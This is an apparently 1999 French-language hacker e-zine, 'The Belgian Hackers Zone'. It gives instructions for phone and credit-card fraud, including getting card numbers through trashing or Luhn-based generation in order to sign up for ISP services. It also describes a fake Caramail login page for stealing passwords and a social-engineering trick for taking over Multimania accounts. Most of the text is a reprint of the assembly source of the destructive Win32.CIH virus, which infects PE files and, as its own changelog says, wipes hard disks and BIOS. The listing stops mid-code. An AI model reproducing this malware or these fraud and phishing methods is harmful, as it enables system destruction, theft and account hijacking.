œœœœœœ õõõõõõ**** ** ************** **|********* ** ** ************* ** œœœœœ *** *** ** 666 * *|* ** *** ** 666 * *| * ** ** ** ** *|* * ** ** ** *| * ** ** *** **|12345678910 ù%%%%õõœœœ *** **|* ******* ******** *** **|* *** ** 666 * ** $$|* ** ** ** ** *|* * ** ** ** *|** ** ** ** ** */* ******** *** ** ** $$$$$$$ BHZ *** !!!!!!!!!!!!! * ----- **** æææææææææææ **** **** **** The Belgian Hackers Zone !!!!!!!!! ***Ouvrez ce fichier avec EDIT***ET PAS AVEC NOTEPAD OU WORDPAD***!!!***$$$*** SOMMAIRE : ----------- [**@\/\/\/@**]1.1 PHREAKING:Les gsm Mobistar(les cartes Tempooo)[**@\/\/\/@**] [**@\/\/\/@**]1.2 HACKING:Abonnements gratos chez les provideurs[**@\/\/\/@**] [**@\/\/\/@**]1.3 PHREAKING:Telephoner gratos sur les GSM [**@\/\/\/@**] [**@\/\/\/@**]1.4 HACKING:Hack de caramail [**@\/\/\/@**] [**@\/\/\/@**]1.5 HACKING:Hack de pages multimania [**@\/\/\/@**] [**@\/\/\/@**]1.6 EXPLOIT:Bug de securite de Netscape 4.x [**@\/\/\/@**] [**@\/\/\/@**]1.7 CARDING:Algorythme de la cle de luhn [**@\/\/\/@**] [**@\/\/\/@**]1.8 EXPLOIT:Plantage de Internet Explorer 5 [**@\/\/\/@**] [**@\/\/\/@**]1.9 VIRUS:Source du Virus Win32.CIH en assembleur[**@\/\/\/@**] [**@\/\/\/@**]2.0 DELIRE:Toi aussi tu peux etre Mi te nique[**@\/\/\/@**] [**@\/\/\/@**]2.1 SOCIAL ENGINEERING:Comment refiler une taupe?[**@\/\/\/@**] 1.1 Les GSM Mobistar (les cartes Tempooo) ----------------------------------------- [**@\/\/\/@**] Une petite astuce ki marche bien :quand vous achetez une carte de rechargement de 1500 balles y'a avec une carte de 25 balles.Il faut attendre un mois ou deux (le plus longtemps possible)Et la carte de 25 Fr. est devenue une carte de rechargement de 1000 balles... cool hein ?! [**@\/\/\/@**]By Asmodeus the StOrMRider [**@\/\/\/@**]30/08/99[**@\/\/\/@**] 1.2 Abonnements gratuits chez les provideuurs --------------------------------------------- [**@\/\/\/@**] Bon je sais que c'est mis partout et ke de toute facon y'a deja des providers gratuits (freebel par ex.) Alors vous zachetez un bete magazine ou y'a infonie (c'est celui ou y'a le plus de services)Et ben oui paske maintenant meme si c' est des magazines Francais les demos d'infonie marchent en Belgique.Donc pendant l'install de la demo "gratuite" ils vous demandent un nO de carte de credit...S'en procure n'est po difficile:trashing,Social Engineering, Algorythme (voir section)Donc tu entres le nO et pis a la fin de la demo t'as meme plus besoin de re-entre le nO. [**@\/\/\/@**]By Asmodeus the StOrMRider [**@\/\/\/@**]30/08/99[**@\/\/\/@**] 1.3 Telephoner gratoss sur les GSM ----------------------------------- [**@\/\/\/@**] Bon je vous le dit tout de suite ca marche ke sur les Ericcsonn et encore pas tous (j'ai essaye avec le Ga 628)je pense et je sais pas si ca marche avec les cartes de rechargement.C'est tout simple:vous composez le n0 et pis vous tapez 00# et vous appuyez sur OK pour validez.Apres avoir compose le nO le Gsm s'eteint mais vous etes encore en communication. [**@\/\/\/@**]By Asmodeus the StOrMRider [**@\/\/\/@**]30/08/99[**@\/\/\/@**] 1.4 Hack de caramailllll... -------------------------- [**@\/\/\/@**] Bon ce n'est po tres dur.D'abord choisissez un grokon ki est chez caramail. Allez sur le site de cara et si vous avez un modem lent vous remarquerez ke le 'tit logo au milieu (le rond avec des trucs zarbi et les deux cases de saisies au centre)est compose de 4 ou 5 images.Vous les sauvez pis vous creez un fichier Html ou vous mettez les img de la meme facon avec les cases de saisie dedans vous vous enregistrez chez cara avec un nick du genre admin,webmasteur,service-mail,etc... comme il y a deja des bugs si le navigateur accepte pas les cookies,l'internote moyen ne se rendra pas compte de la supercherie.Bien entendu dans le bouton envoyer vous mettez mailto: et votre email et hop vous recevez un mail avec le nick et le pass du grokon. [**@\/\/\/@**]By Asmodeus the StOrMRider[**@\/\/\/@**]30/08/99[**@\/\/\/@**] 1.5 Hack de pages multimaniaaa... ---------------------------------- [**@\/\/\/@**] C'est tres simple : vous allez chez multimania puis dans la section membre et dans "problèmes" ou dans "questions".Il faut que vous puissiez envoyer un message expliquant votre probleme … l'aide d'un formulaire.Vous tapez quelque chose comme"Bonjour,J'ai chang‚ mon e-mail sans en r‚ferrer … Multimania et je n'ai pas recu mon nouveau mot de passe(Multimania a changeé les pass de tous les utilisateurs)J'aimerais recevoir mon nouveau mot de passe a ma nouvelle adresse e-mail: de l4m3r@l4m3.com je suis passe a votreadresse@azertyuioop.ghefh . Merci d'avance."Signez et puis envoyez et hop dans quelques jours vous recevrez un message specifiant le pass !!Utilisez une e-mail que vous n'utiliserez plus apres.Ne faites pas de föt dorto graffphe.Et il ne faut po que ca ait l'air trop chelou. [**@\/\/\/@**]By Asmodeus the StOrMRider[**@\/\/\/@**]30/08/99[**@\/\/\/@**] 1.6 Exploit de Netscape 4.x --------------------------- [**@\/\/\/@**] Il existe un bug de securite dans Netscape Communicator 4.6 Win95, 4.07 Linux (apparement les versions 4.x sont toutes affectees). Le bug se situe dans la facon dont netscape traite le code Javascript dans le titre du document.. On peut inclure le code entre les tags TITLE et /TITLE. Quand l'info du document devient apparente, le code javascript s'execute. Cette procedure peut etre appelee par un script en utilisant 'location="wysiwyg://1/about:document" '. Le probleme est que le code est execute dans un contexte securise du protocole "about:". Ceci peut autoriser l'acces a certains documents par : "about:cache", "about:config", "about:global", etc. Vulnerabilites: * Lire le cache de l'utilisateur et acceder a des infos comme passwords, numeros de carte de credit etc. * Lire des infos sur la config ("about:config"). Cela inclut trouver l'adresse email, les serveurs de courrier, les courriers encodes. On peut meme lire le courrier de l'utilisateur. Le plus dangereux est que la vulnerabilite peut etre UTILISEE PAR UN SIMPLE COURRIER EN FORMAT HTML. Solution: Desactiver JavaScript [**@\/\/\/@**]By Asmodeus the StOrMRider[**@\/\/\/@**]30/08/99[**@\/\/\/@**] 1.7 Algorythme de la cle de Luhn --------------------------------- [**@\/\/\/@**] *Pour ceux ki savent po,la cle de luhn c le 16eme chiffre d'une carte de credit. D'abord je tiens a dire merde a tous ces lamerzz ki se pensent maitres du mondes pask'ils ont un cc generator.Si au moins ils essayaient de comprendre komment ca marche... stucture du nO : ABCD(selon nom de la banque)EFGHIJKLMNO(crees aleatoirements) T(cle de luhn) schema : A < 5_____non____ | | oui | | | A --->2A A --->2A+1 | | | | __________________ | | | C < 5_____non____ | | oui | | | C --->2C C --->2C+1 | | | | __________________ | | | E < 5_____non____ | | oui | | | E --->2E E --->2E+1 | | | | __________________ | | | G < 5_____non____ | | oui | | | G --->2G G --->2G+1 | | | | __________________ | | | I < 5_____non____ | | oui | | | I --->2I I --->2I+1 | | | | __________________ | | | K < 5_____non____ | | oui | | | K --->2K K --->2K+1 | | | | __________________ | | | M < 5_____non____ | | oui | | | M --->2M M --->2M+1 | | | | __________________ | | | O < 5_____non____ | | oui | | | O --->2O O --->2O+1 | | | | __________________ | | | on cree S : S=A+B+C+D+E+F+G+H+I+J+K+L+M+N+O on cree T : T=0 | | | S > 0 __non__________________ | | oui | | | on cree V : V=1 | | | V = S___non__ | | | | oui | | | T --->T-1 | | | | | | | | T = -1__non__ | | | | | | oui | | | | | | | T = 9 | | | | | | | |__________| | | | | | | | | V = V+1 | | | | | on recommence a | | l'etape "on cree V" | |___________________________| | | | Afficher T:c'est la cle de luhn | | FIN [**@\/\/\/@**]By Asmodeus the StOrMRider[**@\/\/\/@**]1/09/99[**@\/\/\/@**] 1.8 Exploit de Internet Explorer 5 ---------------------------------- [**@\/\/\/@**] Ce bug provoque le plantage du browser:
[**@\/\/\/@**]By Asmodeus the StOrMRider[**@\/\/\/@**]2/09/99[**@\/\/\/@**] 1.9 L'InterneT d'aujourd'hui ?? ------------------------------- [**@\/\/\/@**] A quoi etait destine l'internet lors de sa creation ?A la COMMUNICATION ! Cela peut paraitre evident mais il y a seulement quelques annees quand on voulait trouver un bon site,il n'y avait pas une centaine de moteurs de recherche qui referenciait des tas de sites inutiles.Que faisaient les internautes ??Ils communiquaient(Il est loin le temps ou je chattais avec les canadiens sur Westwood Chat)Et oui a ce moment la il ne suffisait pas de taper hacking ou hack dans yahoo france ou dans francite pour pouvoir devenir maitre du monde. J'ai commence a utiliser internet il y a 5 ans et demi et je ne m'en suis jamais lasse car c'etait a l'origine un concept base sur la communication. Je suis d'accord sur le fait que toute chose evolue mais regardez ce qu'il se passe aujourd'hui.N'importe qui a acces a n'importe quoi meme si il ne connait rien de rien pas meme trois mots d'anglais.Quand je pense que pour reussir a rassembler des informations je devais depenser temps et energie et surtout je DEVAIS faire de nouvelles rencontres.Maintenant quand on prononce les mots "rencontre","internet",la plupart des gens pensent a un mec et une femme qui s'envoient des mails mais ne se sont jamais rencontres.... Heureusement il y a une sorte de fraternite entre les hackeurs(les vrais,ceux qui font des pages qui ne sont referenciees nulle part mais dont l'URL apparait parfois dans l'une ou l'autre session Irc ou dans un msg ICQ)ceux qui se fichent de savoir si le nombre de leurs visiteurs de ce mois-ci a augmente par rapport au mois dernier.Ce qui les interessent c'est d'apprendre des nouvelles choses, des nouvelles techniques,developpes par des gens comme eux et surtout de partager leur savoir.Pour cela,ils doivent COMMUNIQUER. [**@\/\/\/@**]By Asmodeus the StOrMRider[**@\/\/\/@**]05/9/99[**@\/\/\/@**] 2.0 Source du Virus Win32.CIH (Tchernobyl) en assembleur -------------------------------------------------------- [**@\/\/\/@**] ; **************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * * ; * Designer : CIH Original Place : TTIT of Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.3 * ; * Modification Time : 05/24/1998 * ; * * ; *==========================================================================* ; * Modification History * ; *==========================================================================* ; * v1.0 1. Create the Virus Program. * ; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * ; * 04/26/1998 3. Virus Code doesn't Reload into System. * ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * ; * 6. When System Opens Existing PE File, the File will be * ; * Infected, and the File doesn't be Reinfected. * ; * 7. It is also Infected, even the File is Read-Only. * ; * 8. When the File is Infected, the Modification Date and Time * ; * of the File also don't be Changed. * ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * ; * Previous FileSystemApiHook, it will Call the Function * ; * that the IFS Manager Would Normally Call to Implement * ; * this Particular I/O Request. * ; * 10. The Virus Size is only 656 Bytes. * ; *==========================================================================* ; * v1.1 1. Especially, the File that be Infected will not Increase * ; * it's Size... ^__^ * ; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * ; * When Exception Error Occurs, Our OS System should be in * ; * Windows NT. So My Cute Virus will not Continue to Run, * ; * it will Jmup to Original Application to Run. * ; * 3. Use Better Algorithm, Reduce Virus Code Size. * ; * 4. The Virus "Basic" Size is only 796 Bytes. * ; *==========================================================================* ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * ; * 2. Modify the Bug of v1.1 * ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * ; *==========================================================================* ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * ; * So When Open WinZip Self-Extractor ==> Don't Infect it. * ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * ; **************************************************************************** .586P ; **************************************************************************** ; * Original PE Executable File(Don't Modify this Section) * ; **************************************************************************** OriginalAppEXE SEGMENT FileHeader: db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h dd 00000000h, VirusSize OriginalAppEXE ENDS ; **************************************************************************** ; * My Virus Game * ; **************************************************************************** ; ********************************************************* ; * Constant Define * ; ********************************************************* TRUE = 1 FALSE = 0 DEBUG = TRUE MajorVirusVersion = 1 MinorVirusVersion = 3 VirusVersion = MajorVirusVersion*10h+MinorVirusVersion IF DEBUG FirstKillHardDiskNumber = 81h HookExceptionNumber = 05h ELSE FirstKillHardDiskNumber = 80h HookExceptionNumber = 03h ENDIF FileNameBufferSize = 7fh ; ********************************************************* ; ********************************************************* VirusGame SEGMENT ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame ; ********************************************************* ; * Ring3 Virus Game Initial Program * ; ********************************************************* MyVirusStart: push ebp ; ************************************* ; * Let's Modify Structured Exception * ; * Handing, Prevent Exception Error * ; * Occurrence, Especially in NT. * ; ************************************* lea eax, [esp-04h*2] xor ebx, ebx xchg eax, fs:[ebx] call @0 @0: pop ebx lea ecx, StopToRunVirusCode-@0[ebx] push ecx push eax ; ************************************* ; * Let's Modify * ; * IDT(Interrupt Descriptor Table) * ; * to Get Ring0 Privilege... * ; ************************************* push eax ; sidt [esp-02h] ; Get IDT Base Address pop ebx ; add ebx, HookExceptionNumber*08h+04h ; ZF = 0 cli mov ebp, [ebx] ; Get Exception Base mov bp, [ebx-04h] ; Entry Point lea esi, MyExceptionHook-@1[ecx] push esi mov [ebx-04h], si ; shr esi, 16 ; Modify Exception mov [ebx+02h], si ; Entry Point Address pop esi ; ************************************* ; * Generate Exception to Get Ring0 * ; ************************************* int HookExceptionNumber ; GenerateException ReturnAddressOfEndException = $ ; ************************************* ; * Merge All Virus Code Section * ; ************************************* push esi mov esi, eax LoopOfMergeAllVirusCodeSection: mov ecx, [eax-04h] rep movsb sub eax, 08h mov esi, [eax] or esi, esi jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 jmp LoopOfMergeAllVirusCodeSection QuitLoopOfMergeAllVirusCodeSection: pop esi ; ************************************* ; * Generate Exception Again * ; ************************************* int HookExceptionNumber ; GenerateException Again ; ************************************* ; * Let's Restore * ; * Structured Exception Handing * ; ************************************* ReadyRestoreSE: sti xor ebx, ebx jmp RestoreSE ; ************************************* ; * When Exception Error Occurs, * ; * Our OS System should be in NT. * ; * So My Cute Virus will not * ; * Continue to Run, it Jmups to * ; * Original Application to Run. * ; ************************************* StopToRunVirusCode: @1 = StopToRunVirusCode xor ebx, ebx mov eax, fs:[ebx] mov esp, [eax] RestoreSE: pop dword ptr fs:[ebx] pop eax ; ************************************* ; * Return Original App to Execute * ; ************************************* pop ebp push 00401000h ; Push Original OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack ret ; Return to Original App Entry Point ; ********************************************************* ; * Ring0 Virus Game Initial Program * ; ********************************************************* MyExceptionHook: @2 = MyExceptionHook jz InstallMyFileSystemApiHook ; ************************************* ; * Do My Virus Exist in System !? * ; ************************************* mov ecx, dr0 jecxz AllocateSystemMemoryPage add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException ; ************************************* ; * Return to Ring3 Initial Program * ; ************************************* ExitRing0Init: mov [ebx-04h], bp ; shr ebp, 16 ; Restore Exception mov [ebx+02h], bp ; iretd ; ************************************* ; * Allocate SystemMemory Page to Use * ; ************************************* AllocateSystemMemoryPage: mov dr0, ebx ; Set the Mark of My Virus Exist in System push 00000000fh ; push ecx ; push 0ffffffffh ; push ecx ; push ecx ; push ecx ; push 000000001h ; push 000000002h ; int 20h ; VMMCALL _PageAllocate _PageAllocate = $ ; dd 00010053h ; Use EAX, ECX, EDX, and flags add esp, 08h*04h xchg edi, eax ; EDI = SystemMemory Start Address lea eax, MyVirusStart-@2[esi] iretd ; Return to Ring3 Initial Program ; ************************************* ; * Install My File System Api Hook * ; ************************************* InstallMyFileSystemApiHook: lea eax, FileSystemApiHook-@6[edi] push eax ; int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook IFSMgr_InstallFileSystemApiHook = $ ; dd 00400067h ; Use EAX, ECX, EDX, and flags mov dr0, eax ; Save OldFileSystemApiHook Address pop eax ; EAX = FileSystemApiHook Address ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] mov edx, [ecx] mov OldInstallFileSystemApiHook-@3[eax], edx ; Modify IFSMgr_InstallFileSystemApiHook Entry Point lea eax, InstallFileSystemApiHook-@3[eax] mov [ecx], eax cli jmp ExitRing0Init ; ********************************************************* ; * Code Size of Merge Virus Code Section * ; ********************************************************* CodeSizeOfMergeVirusCodeSection = offset $ ; ********************************************************* ; * IFSMgr_InstallFileSystemApiHook * ; ********************************************************* InstallFileSystemApiHook: push ebx call @4 ; @4: ; pop ebx ; mov ebx, offset FileSystemApiHook add ebx, FileSystemApiHook-@4 ; push ebx int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook IFSMgr_RemoveFileSystemApiHook = $ dd 00400068h ; Use EAX, ECX, EDX, and flags pop eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link Client FileSystemApiHook push dword ptr [esp+8] call OldInstallFileSystemApiHook-@3[ebx] pop ecx push eax ; Call Original IFSMgr_InstallFileSystemApiHook ; to Link My FileSystemApiHook push ebx call OldInstallFileSystemApiHook-@3[ebx] pop ecx mov dr0, eax ; Adjust OldFileSystemApiHook Address pop eax pop ebx ret ; ********************************************************* ; * Static Data * ; ********************************************************* OldInstallFileSystemApiHook dd ? ; ********************************************************* ; * IFSMgr_FileSystemHook * ; ********************************************************* ; ************************************* ; * IFSMgr_FileSystemHook Entry Point * ; ************************************* FileSystemApiHook: @3 = FileSystemApiHook pushad call @5 ; @5: ; pop esi ; mov esi, offset VirusGameDataStartAddress add esi, VirusGameDataStartAddress-@5 ; ************************************* ; * Is OnBusy !? * ; ************************************* test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) jnz pIFSFunc ; goto pIFSFunc ; ************************************* ; * Is OpenFile !? * ; ************************************* ; if ( NotOpenFile ) ; goto prevhook lea ebx, [esp+20h+04h+04h] cmp dword ptr [ebx], 00000024h jne prevhook ; ************************************* ; * Enable OnBusy * ; ************************************* inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ; ************************************* ; * Get FilePath's DriveNumber, * ; * then Set the DriveName to * ; * FileNameBuffer. * ; ************************************* ; * Ex. If DriveNumber is 03h, * ; * DriveName is 'C:'. * ; ************************************* ; mov esi, offset FileNameBuffer add esi, FileNameBuffer-@6 push esi mov al, [ebx+04h] cmp al, 0ffh je CallUniToBCSPath add al, 40h mov ah, ':' mov [esi], eax inc esi inc esi ; ************************************* ; * UniToBCSPath * ; ************************************* ; * This Service Converts * ; * a Canonicalized Unicode Pathname * ; * to a Normal Pathname in the * ; * Specified BCS Character Set. * ; ************************************* CallUniToBCSPath: push 00000000h push FileNameBufferSize mov ebx, [ebx+10h] mov eax, [ebx+0ch] add eax, 04h push eax push esi int 20h ; VXDCall UniToBCSPath UniToBCSPath = $ dd 00400041h add esp, 04h*04h ; ************************************* ; * Is FileName '.EXE' !? * ; ************************************* ; cmp [esi+eax-04h], '.EXE' cmp [esi+eax-04h], 'EXE.' pop esi jne DisableOnBusy IF DEBUG ; ************************************* ; * Only for Debug * ; ************************************* ; cmp [esi+eax-06h], 'FUCK' cmp [esi+eax-06h], 'KCUF' jne DisableOnBusy ENDIF ; ************************************* ; * Is Open Existing File !? * ; ************************************* ; if ( NotOpenExistingFile ) ; goto DisableOnBusy cmp word ptr [ebx+18h], 01h jne DisableOnBusy ; ************************************* ; * Get Attributes of the File * ; ************************************* mov ax, 4300h int 20h ; VXDCall IFSMgr_Ring0_FileIO IFSMgr_Ring0_FileIO = $ dd 00400032h jc DisableOnBusy push ecx ; ************************************* ; * Get IFSMgr_Ring0_FileIO Address * ; ************************************* mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] mov edi, [edi] ; ************************************* ; * Is Read-Only File !? * ; ************************************* test cl, 01h jz OpenFile ; ************************************* ; * Modify Read-Only File to Write * ; ************************************* mov ax, 4301h xor ecx, ecx call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Open File * ; ************************************* OpenFile: xor eax, eax mov ah, 0d5h xor ecx, ecx xor edx, edx inc edx mov ebx, edx inc ebx call edi ; VXDCall IFSMgr_Ring0_FileIO xchg ebx, eax ; mov ebx, FileHandle ; ************************************* ; * Need to Restore * ; * Attributes of the File !? * ; ************************************* pop ecx pushf test cl, 01h jz IsOpenFileOK ; ************************************* ; * Restore Attributes of the File * ; ************************************* mov ax, 4301h call edi ; VXDCall IFSMgr_Ring0_FileIO ; ************************************* ; * Is Open File OK !? * ; ************************************* IsOpenFileOK: popf jc DisableOnBusy ; ************************************* ; * Open File Already Succeed. ^__^ * ; ************************************* push esi ; Push FileNameBuffer Address to Stack pushf ; Now CF = 0, Push Flag to Stack add esi, DataBuffer-@7 ; mov esi, offset DataBuffer ; *************************** ; * Get OffsetToNewHeader * ; *************************** xor eax, eax mov ah, 0d6h ; For Doing Minimal VirusCode's Length, ; I Save EAX to EBP. mov ebp, eax xor ecx, ecx mov cl, 04h xor edx, edx mov dl, 3ch call edi ; VXDCall IFSMgr_Ring0_FileIO mov edx, [esi] ; *************************** ; * Get 'PE\0' Signature * ; * of ImageFileHeader, and * ; * Infected Mark. * ; *************************** dec edx mov eax, ebp call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Is PE !? * ; *************************** ; * Is the File * ; * Already Infected !? * ; *************************** ; cmp [esi], '\0PE\0' cmp dword ptr [esi], 00455000h jne CloseFile ; ************************************* ; * The File is ^o^ * ; * PE(Portable Executable) indeed. * ; ************************************* ; * The File isn't also Infected. * ; ************************************* ; ************************************* ; * Start to Infect the File * ; ************************************* ; * Registers Use Status Now : * ; * * ; * EAX = 04h * ; * EBX = File Handle * ; * ECX = 04h * ; * EDX = 'PE\0\0' Signature of * ; * ImageFileHeader Pointer's * ; * Former Byte. * ; * ESI = DataBuffer Address ==> @8 * ; * EDI = IFSMgr_Ring0_FileIO Address * ; * EBP = D600h ==> Read Data in File * ; ************************************* ; * Stack Dump : * ; * * ; * ESP => ------------------------- * ; * | EFLAG(CF=0) | * ; * ------------------------- * ; * | FileNameBufferPointer | * ; * ------------------------- * ; * | EDI | * ; * ------------------------- * ; * | ESI | * ; * ------------------------- * ; * | EBP | * ; * ------------------------- * ; * | ESP | * ; * ------------------------- * ; * | EBX | * ; * ------------------------- * ; * | EDX | * ; * ------------------------- * ; * | ECX | * ; * ------------------------- * ; * | EAX | * ; * ------------------------- * ; * | Return Address | * ; * ------------------------- * ; ************************************* push ebx ; Save File Handle push 00h ; Set VirusCodeSectionTableEndMark ; *************************** ; * Let's Set the * ; * Virus' Infected Mark * ; *************************** push 01h ; Size push edx ; Pointer of File push edi ; Address of Buffer ; *************************** ; * Save ESP Register * ; *************************** mov dr1, esp ; *************************** ; * Let's Set the * ; * NewAddressOfEntryPoint * ; * ( Only First Set Size ) * ; *************************** push eax ; Size ; *************************** ; * Let's Read * ; * Image Header in File * ; *************************** mov eax, ebp mov cl, SizeOfImageHeaderToRead add edx, 07h ; Move EDX to NumberOfSections call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Let's Set the * ; * NewAddressOfEntryPoint * ; * ( Set Pointer of File, * ; * Address of Buffer ) * ; *************************** lea eax, (AddressOfEntryPoint-@8)[edx] push eax ; Pointer of File lea eax, (NewAddressOfEntryPoint-@8)[esi] push eax ; Address of Buffer ; *************************** ; * Move EDX to the Start * ; * of SectionTable in File * ; *************************** movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] lea edx, [eax+edx+12h] ; *************************** ; * Let's Get * ; * Total Size of Sections * ; *************************** mov al, SizeOfScetionTable ; I Assume NumberOfSections <= 0ffh mov cl, (NumberOfSections-@8)[esi] mul cl ; *************************** ; * Let's Set Section Table * ; *************************** ; Move ESI to the Start of SectionTable lea esi, (StartOfSectionTable-@8)[esi] push eax ; Size push edx ; Pointer of File push esi ; Address of Buffer ; *************************** ; * The Code Size of Merge * ; * Virus Code Section and * ; * Total Size of Virus * ; * Code Section Table Must * ; * be Small or Equal the * ; * Unused Space Size of * ; * Following Section Table * ; *************************** inc ecx push ecx ; Save NumberOfSections+1 shl ecx, 03h push ecx ; Save TotalSizeOfVirusCodeSectionTable add ecx, eax add ecx, edx sub ecx, (SizeOfHeaders-@9)[esi] not ecx inc ecx cmp cx, small CodeSizeOfMergeVirusCodeSection jl short OnlySetInfectedMark ; *************************** ; * Save Original * ; * Address of Entry Point * ; *************************** ; Save My Virus First Section Code ; Size of Following Section Table... ; ( Not Include the Size of Virus Code Section Table ) push ecx xchg ecx, eax ; ECX = Size of Section Table mov eax, (AddressOfEntryPoint-@9)[esi] add eax, (ImageBase-@9)[esi] mov (OriginalAddressOfEntryPoint-@9)[esi], eax ; *************************** ; * Read All Section Tables * ; *************************** mov eax, ebp call edi ; VXDCall IFSMgr_Ring0_FileIO ; *************************** ; * Let's Set Total Virus * ; * Code Section Table * ; *************************** ; EBX = My Virus First Section Code ; Size of Following Section Table pop ebx pop edi ; EDI = TotalSizeOfVirusCodeSectionTable pop ecx ; ECX = NumberOfSections+1 push edi ; Size add edx, eax push edx ; Pointer of File add eax, esi ; Modify the Bug that WinZip Self-Extractor Occurs Error... ; So When Open WinZip Self-Extractor, My Virus Don't Infect it... ; The WinZip Self-Extractor Last Section Name is '_winzip_' ; I Just Only Test Last Four Bytes ==> 'zip_' cmp dword ptr [eax-SizeOfScetionTable+04h], '_piz' je OnlySetInfectedMark push eax ; Address of Buffer ; *************************** ; * Set the First Virus * ; * Code Section Size in * ; * VirusCodeSectionTable * ; *************************** lea eax, [eax+edi-04h] mov [eax], ebx ; *************************** ; * Let's Set My Virus * ; * First Section Code * ; *************************** push ebx ; Size add edx, edi push edx ; Pointer of File lea edi, 